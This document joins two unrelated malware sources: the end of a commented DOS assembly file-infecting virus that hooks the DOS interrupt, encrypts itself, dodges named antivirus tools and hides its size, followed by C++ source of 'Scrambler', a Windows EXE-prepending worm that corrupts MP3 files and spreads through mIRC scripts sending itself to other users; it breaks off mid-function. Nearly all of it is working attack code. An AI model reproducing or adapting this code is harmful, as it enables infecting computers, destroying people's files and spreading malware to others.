;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz call f_ptr fc
sub_0E5F proc near
xor cx, cx
mov dx, cx
sub_0E63:
mov ax, 4200h
jmp short loc_0E6F
sub_0E68:
xor cx, cx
mov dx, cx
sub_0E6C:
mov ax, 4202h
sub_0E6F:
loc_0E6F:
mov bx, word ptr cs:[handle - p]

; Diz call old_int_21h


int_21h:
pushf
cli
call dword ptr cs:[old_int_21h - p__]
retn
sub_0E5F endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz infectz the file ...
sub_0E7C proc near
mov bp, sp
mov ax, 5700h ; gimme file_time_&_date
call sub_0E6F
mov bx, offset file_time_date - p
mov [bx], cx ; store time_stamp
mov [bx+2], dx ; store date_stamp
call sub_1157 ; file already infected ?
jc short loc_0F0A
mov dx, 1Eh
call random_number ; gimme random_number
or dx, dx ; null ?
jz short loc_0E9D
mov [bx], ax ; nope so store new_time_stamp
loc_0E9D:
mov word ptr ds:[buffer_offset - p], offset overwritten_bytez - p
mov dx, 0FFFFh
push dx
call random_number ; gimme random_number
mov ds:[crypt_viruz_value - p], dx ; store it
mov ds:[crypt_viruz - p__], dx ; store it
pop dx
call random_number ; gimme next_random_number
mov ds:[next_crypt_value_ - p], dx ; store it
mov ds:[next_crypt_value - p__], dx ; store it
call sub_0E5F ; go2 sof
mov cx, 1Ah ; read 1ah_bytez
mov dx, offset file_buffer - p; 2 file_buffer
push dx ; (exe_hdr or 3bytez from com)
call f_read_ ; read it
jc short loc_0F24 ; error ?
xchg si, dx ; move these
mov di, offset exe_header - p
rep movsb ; bytez
call sub_0E68 ; go2 eof
mov si, ax ; size in ax : dx
mov di, dx ; 2 si : di
pop bx
cmp word ptr [bx], 4D5Ah ; 'MZ' ?
je short loc_0EFA ; it'z exe_file ?
cmp word ptr [bx], 5A4Dh ; 'ZM' ?
je short loc_0EFA ; it'z exe_file ?
mov byte ptr ds:[exe_flag - p], 0; nope = clear exe_flag
cmp ax, 0EFA6h ; file not 2 big ?
cmc
jc short loc_0F24
mov ax, 3 ; nope
cwd ; null dx_reg
push bx
jmp short loc_0F16
loc_0EFA:
mov byte ptr ds:[exe_flag - p], 1 ; set up exe_flag
mov ax, [bx+4] ; gime page_cnt
mul word ptr ds:[page_size_ - p] ; mul it with page_size
sub ax, si
sbb dx, di
loc_0F0A:
jc short loc_0F24
mov ax, [bx+8] ; gimme hdr_size
mul word ptr ds:[hdr_size_ - p] ; mul it with hdr_size
push bx
push ax
push dx
loc_0F16:
sub si, ax ; sub hdr_size
sbb di, dx ; or 3 bytez 4 far_jmp
or di, di ; file bigger than 0ffffh bytez ?
jnz short loc_0F2C
mov dx, si ; nope
sub dx, 3E8h ; so check whether the file
loc_0F24: ; iz not 2 small
jc short loc_0F98
cmp dx, 7D0h ; size less than 7d0h ?
jbe short loc_0F2F
loc_0F2C:
mov dx, 7D0h ; set max_number 2 7d0h
loc_0F2F:
call random_number ; gimme random_number
add dx, 3E8h ; add 7d0h / 2
mov ds:[viruz_start - p], dx ; store viruz_start
add dx, offset buffer - p + 280h ; add dx viruz_size
; + space 4 stack
cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ?
je short loc_0F49
mov ds:[file_buffer - p + 10h], dx ; yope store new exe_sp
loc_0F49:
add dx, 0FD80h ; sub 280h
mov ds:[viruz_end - p], dx ; store viruz_end
add dx, 0 - (offset buffer - offset loc_08d1)
mov ds:[beginning_ofs - p], dx; store beginning_ofs
add dx, 0 - (offset loc_08d1 - offset loc_0582) - 9
mov ds:[max_number - p], dx ; store max_number
add dx, 8 ; add 8 (viz up - 9 ...)
not dx ; make signed_number
mov cx, 0FFFFh ; the f_ptr functionz
; are signed
; so it will sub from the eof
; cx : dx ...
call sub_0E6C
mov ds:[mov_cx_?_ - p], dx ; store new_file_poz
mov ds:[mov_dx_?_ - p], ax ; as a base ...
cmp byte ptr ds:[exe_flag - p], 0 ; com_file ?
jne short loc_0F81
xchg dx, ax ; gimme base
add dx, 100h ; add 100h
jmp short loc_0F8B ; and go on
loc_0F81:
pop di
pop si
sub ax, si ; count base_addr
sbb dx, di
div word ptr ds:[hdr_size_ - p]
loc_0F8B:
add ds:[viruz_start - p], dx; add base
add ds:[viruz_end - p], dx ; add base
push ax
push dx
call sub_0BDB ; ok now prepare decode_rout...
loc_0F98:
jc short loc_0FFE ; error ?
pop dx ; and now add base
pop ax ; 2 decode_routine_table_
mov cx, 0Ah ; _entryz ...
mov si, offset decode_routine_table - p

locloop_0FA2:
add [si], dx ; add base
inc si ; go2 next_entry
inc si
loop locloop_0FA2 ; and go on ...

pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; com_file ?
jne short loc_0FD0
mov byte ptr [bx], 0E9h ; store far_jump
mov ax, ds:[decode_routine_table - p]; gimme jump_offset
sub ax, 103h ; sub 103h (100h PSP and 03h
; far_jmp)
mov [bx+1], ax ; store it
mov word ptr ds:[relo_cnt - p], 0; store relo_cnt
mov word ptr ds:[relo_cs - p], 0FFF0h; store relo_cs
mov word ptr ds:[exe_ip - p], 100h; store exe_ip
jmp short loc_0FF7 ; and go on
loc_0FD0: ; nope exe_file
mov [bx+16h], ax ; store relo_cs
mov [bx+0Eh], ax ; store relo_ss
mov ax, ds:[decode_routine_table - p]; gimme starting_ofs
mov [bx+14h], ax ; store exe_ip
add [bx+10h], dx ; add it 2 exe_sp
mov word ptr [bx+6], 0 ; null relo_cnt
mov ax, 28h ; my_min_mem 2 ax
cmp [bx+0Ah], ax ; compare it with min_mem
jae short loc_0FEF ; more ?
mov [bx+0Ah], ax ; yope so store my_min_mem
loc_0FEF:
cmp [bx+0Ch], ax ; compare it with max_mem
jae short loc_0FF7 ; more ?
mov [bx+0Ch], ax ; yope so store my_max_mem
loc_0FF7:
push bx
call sub_0E68 ; go2 eof
db 0e8h ; call presun_rutiny (
; viruz_body_crypt_&_write)
dw offset presun_rutiny - presun_rutiny + buffer - next___
next___ label near ; crypt_ it and write it
loc_0FFE:
jc short loc_1031
call sub_0E68 ; go2 eof
div word ptr ds:[page_size_ - p] ; div new_file_size
inc ax ; 2 count pagez
pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ?
je short loc_1016
mov [bx+4], ax ; store new page_cnt
mov [bx+2], dx ; store new part_pag
loc_1016:
push bx
call sub_0E5F ; go2 sof
mov cx, 1Ah
pop dx
call f_write_ ; write new_exe_header 2 file
jc short loc_1031 ; error ?
mov ax, 5701h ; set back file_time_date
mov cx, ds:[file_time_date - p] ; gimme time_stamp
mov dx, ds:[file_time_date - p + 2] ; gimme date_stamp
call sub_0E6F ; set it
loc_1031:
mov sp, bp
retn ; and end ...
sub_0E7C endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz setz my own error_handler
sub_1034 proc near
push dx
push ds
push cs
pop ds
mov ax, 3524h ; gimme old_int_24h
call int_21h
mov ds:[old_int_24h - p + 2], es ; store it
mov ds:[old_int_24h - p], bx
mov ax, 2524h ; and set my own
mov dx, offset new_int_24h - p__ ; handler
call int_21h
pop ds
pop dx
retn ; and end ...
sub_1034 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz setz back old_int_24h
sub_1052 proc near
mov ax, 2524h
lds dx, dword ptr cs:[old_int_24h - p]; gimme old_int_24h
call int_21h ; set it back
retn ; and end ...
sub_1052 endp

_com_ db 04h, '.COM' ; offset 105eh


_exe_ db 04h, '.EXE' ; offset 1063h
_scan_ db 04h, 'SCAN' ; offset 1068h
_clean_ db 05h, 'CLEAN' ; offset 106dh
_findviru_ db 08h, 'FINDVIRU' ; offset 1073h
_guard_ db 05h, 'GUARD' ; offset 107ch
_nod_ db 03h, 'NOD' ; offset 1082h
_vsafe_ db 05h, 'VSAFE' ; offset 1086h
_msav_ db 04h, 'MSAV' ; offset 108ch
_chkdsk_ db 06h, 'CHKDSK' ; offset 1091h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz checkz the file_name and drive ...
sub_1098 proc near
push dx
push bx
push cx
push si
push di ; push regz
push ds
push es
push ax
mov si, dx ; gimme file_name_offset
mov di, name_buffer - p ; gimme buffer where 2 store
push cs
pop es
lea bx, [di-1]
mov cx, 4Bh ; try it 4bh*

locloop_10AD:
lodsb ; read byte
cmp al, 61h ; 'a'
jb short loc_10B8 ; low_case ?
cmp al, 7Ah ; 'z'
ja short loc_10B8
sub al, 20h ; yope so make high_case
loc_10B8:
push ax
push si
loc_10BA: ; nope
cmp al, 20h ; space ?
jne short loc_10C7
lodsb ; read byte
or al, al ; null ?
jnz loc_10BA
pop si ; yope
pop si
jmp short loc_10D7 ; end ...
loc_10C7:
pop si
pop ax
cmp al, 5Ch ; '\'
je short loc_10D5
cmp al, 2Fh ; '/'
je short loc_10D5
cmp al, 3Ah ; ':'
jne short loc_10D7
loc_10D5:
mov bx, di ; store offset 2 bx
loc_10D7:
stosb ; store byte
or al, al ; null ?
jz short loc_10DE
loop locloop_10AD ; and go on

loc_10DE: ; yope
mov si, offset _com_ - p ; check 4 .COM or .EXE
sub di, 5 ; sub 5 (.XXX, 0)
push cs
pop ds
call sub_1149 ; it'z .COM ?
jz short loc_10F0
call sub_1149 ; it'z .EXE ?
jnz short loc_113C
loc_10F0: ; yope
pop ax
push ax
xchg di, bx ; gimme file_name_offset
inc di ; inc it (/, \, or : ...)
cmp ax, 4B00h ; fc run file ?
jne short loc_1107
mov si, offset _chkdsk_ - p
call sub_1149 ; do we run CHKDISK ?
jnz short loc_1107
mov byte ptr ds:[fcb_jmp_ - p], offset loc_121a - (fcb_jmp_ + 1)
; yope so turn off fcb_sub_viruz_size
loc_1107:
mov cx, 7 ; check 4 7 antivirusez
mov si, offset _scan_ - p ; start with SCAN

locloop_110D:
push cx
call sub_1149 ; compare name
pop cx
jz short loc_113C ; it'z antiviruz ?
loop locloop_110D ; nope go on

mov si, offset name_buffer - p ; gimme name_buffer


xor bl, bl ; 2 get drive
lodsw
cmp ah, 3Ah ; ':'
jne short loc_1125
sub al, 40h ; ok make valid_drive_number
mov bl, al ; and store it 2 bl
loc_1125:
mov ax, 4408h ; get drive_statuz
call int_21h
or ax, ax ; medium can be exchanged ?
which_jump_? db 74h
db offset loc_1146 - ($ + 1)
mov ax, 4409h ; get far disk statuz
call int_21h
jc short loc_113C ; error ?
test dh, 10h ; iz far disk in net ?
jnz short loc_1146
loc_113C:
stc ; set error_flag
loc_113D:
pop ax
pop es
pop ds
pop di
pop si ; restore regz
pop cx
pop bx
pop dx
retn ; and end ...
loc_1146:
clc ; clear error_flag
jmp short loc_113D ; and end ...
sub_1098 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz comparez 2 stringz
sub_1149 proc near
push di
lodsb ; gimme bytez_count
mov cl, al ; store it 2 cx
mov ax, si ; gimme si
add ax, cx ; add bytez_count 2 offset
repe cmpsb ; compare
mov si, ax ; store new_offset
pop di
retn ; and end ...
sub_1149 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz checkz whether there'z a viruz in the file or not ...
; and if not returnz in ax the value which iz 4 infected
sub_1157 proc near
push dx
mov ax, es:[bx+2] ; gimme date
xor dx, dx
div word ptr cs:[date_div-p]; div it
mov ax, es:[bx] ; gimme time
and al, 1Fh ; and it
cmp al, dl ; the same ?
stc ; set Cflag (infected)
jz short loc_1176
mov ax, es:[bx] ; gimme time
and ax, 0FFE0h ; and it
or al, dl ; or it with date
clc ; clear Cflag (not infected)
loc_1176:
pop dx
retn ; and end ...
sub_1157 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Sub viruz_size
sub_1178 proc near
sub word ptr es:[bx], offset buffer - p; sub viruz_file
sbb word ptr es:[bx+2], 0
jnc short loc_ret_118E ; underflow ?
add word ptr es:[bx], offset buffer - p; yope
adc word ptr es:[bx+2], 0 ; so add it back

loc_ret_118E:
retn
sub_1178 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz iz main infection routine ...
sub_118F proc near
push ax
push bx
push cx
push si ; push regz
push di
push bp
push ds
push es
call sub_1034 ; set my int_24h
mov ax, 4300h ; gimme file_attribz
call int_21h
mov cs:[file_attribz - p], cx; store it
mov ax, 4301h ; set new attribz
xor cx, cx ; no attribz
call int_21h
jc short loc_11D3 ; error ?
mov ax, 3D02h ; open file 4 read_&_write
call int_21h
jc short loc_11CA ; error ?
push dx
push ds
push cs
pop ds
push cs
pop es
mov ds:[handle - p], ax ; store handle
call sub_0E7C ; ok infect the file
mov ah, 3Eh
call sub_0E6F ; close file
pop ds
pop dx
loc_11CA:
mov ax, 4301h ; set back old_attribz
db 0b9h ; mov cx, ?
file_attribz dw 20h
call int_21h
loc_11D3:
call sub_1052 ; set back old_int_24h
pop es
pop ds
pop bp
pop di
pop si ; restore regz
pop cx
pop bx
pop ax
retn ; and end ...
sub_118F endp

new_int_21h:
pushf
sti
cmp ah, 11h ; find_first_FCB_file ?
je short loc_11EB
cmp ah, 12h ; find next_FCB_file ?
jne short loc_121A
loc_11EB:
db 0ebh
fcb_jmp_ db 0
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do FCB_function
cmp al, 0FFh ; did we find something ?
je short loc_1216
push ax ; yope
cmp byte ptr es:[bx], 0FFh ; extended FCB ?
jne short loc_1207
add bx, 7 ; yope so jump over ext_FCB
loc_1207:
add bx, 17h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1216 ; already infected ?
add bx, 6 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1216: ; nope
pop es
pop bx
popf
iret
loc_121A:
cmp ah, 4Eh ; find_first_file ?
je short loc_1224
cmp ah, 4Fh ; find_next_file ?
jne short loc_1250
loc_1224:
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do find_function
jc short loc_1249 ; error ?
push ax
add bx, 16h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1242 ; already infected ?
add bx, 4 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1242: ; nope
pop es
pop bx ; restore regz
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_1249: ; yope
pop es
pop bx ; restore regz
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1250:
cmp ax, 4B53h ; it'z mark ?
jne short loc_125A
mov ax, 454Bh ; yope so get 454bh
popf
iret ; and end ...
loc_125A:
cmp ah, 4Ch ; prog'z_end ?
jne short loc_1265
mov byte ptr cs:[fcb_jmp_ - p], 0
loc_1265:
cld
push dx
cmp ax, 4B00h ; run_prog ?
jne short loc_12A9
db 0ebh
run_jmp db offset loc_12a7 - ($ + 1)
push ax
push bx
push ds ; push regz
push es
mov ah, 52h ; gimme list_of_listz
call int_21h
mov ax, es:[bx-2] ; gimme first_mcb
loc_127B:
mov ds, ax
add ax, ds:[3] ; go2 next mcb_block
inc ax
cmp byte ptr ds:[0], 5Ah ; last_one ?
jne loc_127B
mov bx, cs ; yope
cmp ax, bx ; it'z our mcb_block ?
jne short loc_129D
mov byte ptr ds:[0], 4Dh ; make middle_block
xor ax, ax
mov ds, ax
add word ptr ds:[413h], 4 ; add 4K 2 mem which we took
loc_129D:
mov byte ptr cs:[run_jmp-p], offset loc_12a7 - (run_jmp + 1)
pop es ; now jump 2 loc_12a7
pop ds
pop bx ; restore regz
pop ax
loc_12A7:
jmp short loc_12FD
loc_12A9:
cmp ah, 3Dh ; open_file ?
je short loc_12FD
cmp ah, 56h ; rename_file ?
je short loc_12FD
cmp ax, 6C00h ; ext_open_found ?
jne short loc_12C1
test dl, 00010010b ; action 02h or/and 10h ?
mov dx, si
jz short loc_12FD
jmp short loc_1307 ; yope
loc_12C1:
cmp ah, 3Ch ; found_file ?
je short loc_1307
cmp ah, 5Bh ; make_new_file ?
je short loc_1307
cmp ah, 3Eh ; close_file ?
jne short loc_12F6
cmp bx, word ptr cs:[ext_handle - p]; do we have
jne short loc_12F6 ; something 2 infect ?
or bx, bx ; handle is null ?
jz short loc_12F6
call int_21h ; close it
jc short loc_1323
push ds
push cs
pop ds
mov dx, offset ext_file_name - p; gimme file_name
call sub_118F ; and infect it
mov word ptr ds:[ext_handle - p], 0; nulluj ext_handle
pop ds
loc_12F0:
pop dx
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_12F6:
pop dx
popf ; jmp 2 old_int_21h
jmp dword ptr cs:[old_int_21h - p__]
loc_12FD:
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
call sub_118F ; infect it
jmp short loc_12F6
loc_1307:
cmp word ptr cs:[ext_handle - p], 0
jne loc_12F6 ; ext_file already founded ?
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
mov word ptr cs:[file_offset - p], dx; store file_name_
pop dx ; _offset
push dx
call int_21h ; found it
db 0bah ; mov dx, ?
file_offset dw 45cch
jnc short loc_1329 ; error ?
loc_1323: ; yope
pop dx
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1329:
push cx
push si
push di ; ok
push es ; move file_name
xchg si, dx ; 2 our buffer
mov di, offset ext_handle - p
push cs
pop es
stosw ; and store handle of course
mov cx, 4Bh ; move 4bh bytez
rep movsb ; and finally move
pop es
pop di
pop si ; restore regz
pop cx
jmp short loc_12F0 ; and end ...

;
db 'Did you leave the room ?'
;
run_counter dw 04FBh
buffer db 160h dup(?)
three_bytez db ? ; offset 14bah
; instr_buffer - 3
; 0e9h disp16 haz 3 bytez ...
handle dw ? ; offset 14bbh
instr_buffer db 10 dup(?) ; offset 14bdh
file_buffer db 1ah dup(?) ; offset 14c7h
old_int_24h dd ? ; offset 14e1h
file_time_date dd ? ; offset 14e5h
ext_handle dw ? ; offset 14e9h
ext_file_name db 4bh dup(?) ; offset 14ebh
name_buffer db 4bh dup(?) ; offset 1536h
;
seg_a ends
end start
/*
Virus Name: Scrambler
Version: B
Type: Win32 EXE Prepender / I-Worm
Author: Gigabyte
Homepage: http://gigabyte.coderz.net
*/

#include <iostream>
#include <windows.h>
#include <direct.h>
#include <time.h>

using namespace std;

char hostfile[MAX_PATH], CopyHost[MAX_PATH], Virus[MAX_PATH];


char Buffer[MAX_PATH], mp3[MAX_PATH], mp3copy[MAX_PATH], checksum[2];
char gbmark[2], CopyName[10], ScramFile[MAX_PATH], FullPath[MAX_PATH];
char WinScript[MAX_PATH], DirToInfect[MAX_PATH], RepairHost[MAX_PATH];
FILE *scrambler;

void VirCheck(char SRCFileName[])


{
FILE *SRC;
char Buffer[1];
short Counter = 0;
int v = 0;
SRC = fopen(SRCFileName, "rb");
if(SRC)
{

for (v = 0; v < 19; v ++)


{
Counter = fread(Buffer, 1, 1, SRC);
}

strcpy(checksum, Buffer);

for (v = 0; v < 1; v ++)


{
Counter = fread(Buffer, 1, 1, SRC);
}

strcat(checksum, Buffer);
}
fclose(SRC);
}

void WriteVirus(char SRCFileName[], char DSTFileName[])


{
FILE *SRC, *DST;
char Buffer[1024];
short Counter = 0;
int v = 0;
SRC = fopen(SRCFileName, "rb");
if(SRC)
{
DST = fopen(DSTFileName, "wb");
if(DST)
{
for (v = 0; v < 4928; v ++)
{
Counter = fread(Buffer, 1, 8, SRC);
if(Counter)
fwrite(Buffer, 1, Counter, DST);
}
}
}
fclose(SRC);
fclose(DST);
}

void AddOrig(char SRCFileName[], char DSTFileName[])


{
FILE *SRC, *DST;
char Buffer[1024];
short Counter = 0;
SRC = fopen(SRCFileName, "rb");
if(SRC)
{
DST = fopen(DSTFileName, "ab");
if(DST)
{
while(! feof(SRC))
{
Counter = fread(Buffer, 1, 1024, SRC);
if(Counter)
fwrite(Buffer, 1, Counter, DST);
}
}
}
fclose(SRC);
fclose(DST);
}

void CopyOrig(char SRCFileName[], char DSTFileName[])


{
FILE *SRC, *DST;
char Buffer[1024];
short Counter = 0;
int v = 0;
SRC = fopen(SRCFileName, "rb");
if(SRC)
{
DST = fopen(DSTFileName, "wb");
if(DST)
{
for (v = 0; v < 4928; v ++)
{
Counter = fread(Buffer, 1, 8, SRC);
if(Counter)
fwrite(Buffer, 0, 0, DST);
}

while(! feof(SRC))
{
Counter = fread(Buffer, 1, 1024, SRC);
if(Counter)
fwrite(Buffer, 1, Counter, DST);
}
}
}
fclose(SRC);
fclose(DST);
}
bool FileExists(char *FileName)
{
HANDLE Exists;
Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);
if(Exists == INVALID_HANDLE_VALUE)
return false;
CloseHandle(Exists);
return true;
}

void Scramble(char SRCFileName[], char DSTFileName[])


{
FILE *SRC, *DST;
char Buffer[60000];
Buffer == 0;
short Counter = 0;
int v = 0;
SRC = fopen(SRCFileName, "rb");
if(SRC)
{
DST = fopen(DSTFileName, "wb");
if(DST)
{
for (v = 0; v < 40; v ++)
{
if(!fseek(SRC, 204800, SEEK_CUR))
{
Counter = fread(Buffer, 1, 60000, SRC);
if(Counter)
{
if(!fseek(DST, 104448, SEEK_CUR))
{
fwrite(Buffer, 1, 60000, DST);
}
}
}
}
}
}
fclose(SRC);
fclose(DST);
}

void ScrambleMP3(char FolderSearch[])


{
WIN32_FIND_DATA FindData;
HANDLE FoundFile;
char FolderSearch2[MAX_PATH];
strcpy(FolderSearch2, FolderSearch);
strcat(FolderSearch2,"\\*.mp3");
FoundFile = FindFirstFile(FolderSearch2, &FindData);
if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}
else
{
GetWindowsDirectory(Buffer,MAX_PATH);
_chdir(Buffer);
_chdir("system");

strcpy(mp3, FolderSearch);
strcat(mp3, "\\");
strcat(mp3, FindData.cFileName );
strcpy(mp3copy, "mp3.tmp");
CopyFile(mp3, mp3copy, FALSE);

Scramble(mp3copy,mp3);
_unlink(mp3copy);
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}

void HDDSearch(char Path[])


{
WIN32_FIND_DATA FindData;
HANDLE FoundFile;
char Path2[MAX_PATH], Folder[MAX_PATH];
strcpy(Path2, Path);
strcat(Path2, "\\*.*");
FoundFile = FindFirstFile(Path2, &FindData);
if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
strcpy(Folder, Path);
strcat(Folder, "\\");
strcat(Folder, FindData.cFileName);
if(FindData.cFileName[0] !='.')
{
HDDSearch(Folder);
ScrambleMP3(Folder);
}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}

void ScriptFile()
{
GetWindowsDirectory(Buffer,MAX_PATH);
fprintf(scrambler,"[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/dcc
send $nick");
fprintf(scrambler," %s%csystem%c%s\nn2=}\n", Buffer, 92, 92, CopyName);
}

void main(int argc, char **argv)


{
cout << "Scrambler" << endl;
cout << "by Gigabyte" << endl;

srand( (unsigned)time( NULL ) );


for(int t = 0; t < 5; t++)
CopyName[t] =char(97 + (rand() % 10));
CopyName[5] = '.';
CopyName[6] = CopyName[8] = 'e';
CopyName[7] = 'x';
CopyName[9] = NULL;

strcpy(Virus, argv[0]);
GetWindowsDirectory(Buffer,MAX_PATH);

strcpy(FullPath, Buffer);
strcat(FullPath, "\\system\\");
strcat(FullPath, CopyName);
WriteVirus(Virus, FullPath);

WIN32_FIND_DATA FindData;
HANDLE FoundFile;

strcat(DirToInfect, Buffer);
strcat(DirToInfect, "\\*.exe");
FoundFile = FindFirstFile(DirToInfect, &FindData);

if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}

else
{
GetWindowsDirectory(Buffer,MAX_PATH);
_chdir(Buffer);
_chdir("system");

strcpy(hostfile, Buffer);
strcat(hostfile, "\\");
strcat(hostfile, FindData.cFileName);

VirCheck(hostfile);

strcpy(gbmark,"gb");

if(FindData.cFileName[3] != 'D')
{
if(FindData.cFileName[0] != 'P')
{
if(FindData.cFileName[0] != 'R')
{
if(FindData.cFileName[0] != 'E')
{
if(FindData.cFileName[0] != 'T')
{
if(FindData.cFileName[0] != 'W')
{
if(FindData.cFileName[0] != 'w')
{
if(FindData.cFileName[5] != 'R')
{
if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);
strcpy(Virus, argv[0]);
CopyFile(FullPath, hostfile, FALSE);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}}}}}}}}}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}

if(FileExists("c:\\mirc\\mirc32.exe"))
{
FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData);

if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}

else
{
_chdir(Buffer);
_chdir("system");

strcpy(hostfile, "c:\\mirc\\download\\");
strcat(hostfile, FindData.cFileName );

VirCheck(hostfile);

strcpy(gbmark,"gb");

if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);

WriteVirus(Virus, hostfile);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}
scrambler = fopen("c:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("c:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("d:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("d:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("e:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("e:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
